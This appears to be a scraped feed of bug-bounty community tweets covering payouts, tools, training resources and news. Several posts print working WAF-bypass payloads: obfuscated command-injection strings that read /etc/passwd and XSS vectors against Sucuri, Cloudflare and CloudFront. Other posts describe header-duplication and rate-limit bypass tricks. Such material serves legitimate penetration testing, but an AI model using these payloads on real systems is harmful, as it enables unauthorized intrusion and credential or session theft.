Ameen Aug 11
Duplicating params, headers, etc. can be useful for bypasses, e.g. file upload filters can potentially be bypassed by setting Content-Type twice (once for an unallowed type and once for an allowed one). Authorization protection could be bypassed with the same method.
Hussein Daher Aug 13
A $7000 FUN bug: SSRF using redirection on my subdomain. RT and sub if you want more! ALSO: I'm interested in any security research team / pentest work (remote). If any company/team is interested in my services, DM me :)
dawgyg Aug 11
Missed my goal by $6230, but $127,000 isn't too bad of a payday. Thanks and
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 Aug 18
Sucuri { RCE }; payloads, dot shot. 🌪️ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </>
trimstray Aug 11
You wanna play a game? Huge lists of: - Ethical Hacking Trainings - CTF Platforms - Pentesting Labs - Web Training Apps (local installation) - Bug Bounty Platforms From:
Fisher Aug 14
Cooking together my new extension, called "Scope Monitor". Will help you keep track of endpoints you tested, highlight the ones you didn't check yet and so on. Will try to release a Beta by next week or so 😊
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 Aug 18
"Cloudflare"; live payloads: 🧠 ~1: <img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'> ~2: <img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&quot;" src="x" alt="showme">
Rotem Reiss Aug 11
In case you missed my write-up on how I found multiple stored-XSS on and was able to take over accounts via a legit STORY (and was also awarded a $1000 bounty 😎)
#BugBountyNews 20h
Fake News and Influence: Information Warfare in the Digital Age
Ankit Thakur 6h
Send your coolest bug and grab your pass for and join and learn from them.
#BugBountyNews 21h
Cisco ‘Knowingly’ Sold Hackable Video Surveillance System to U.S. Government
#BugBountyNews 19h
Breached Passwords Still in Use By Hundreds of Thousands
Vail 23h
Question: which do you guys prefer, a VPS or a VPN? Or both? If one over the other, why?
Ali Tütüncü Aug 12
Wooooow, I thought it would be medium, but I saw this comment 😍😍😍😍 This is my first critical report and I'm waiting for my biggest reward per report <3😎😎
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 3h
{XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
Shubham Mittal 2h
Quick Tip: While you are trying to find more subdomains and you use the Google Dork: site:*.example.com, NEVER forget to check site:*.*.example.com and site:*.*.*.example.com
Sam Stepanyan 16h
The awesome subdomain recon tool is now available in Kali Linux! In your Kali Linux go and open a terminal & type: apt-get update apt-get install amass Many thanks to project leader & the team who made this possible!
𝔸𝕀𝕙𝕒𝕣 𝕁𝕒𝕧𝕖𝕕 Aug 19
Nowadays there is no shortage of TARGETS ... The things you need are motivation + focus + skills to get the most out of it.
Davey Aug 13
Wrote a Burp Suite extension to bypass IP-based rate limiting and blocking.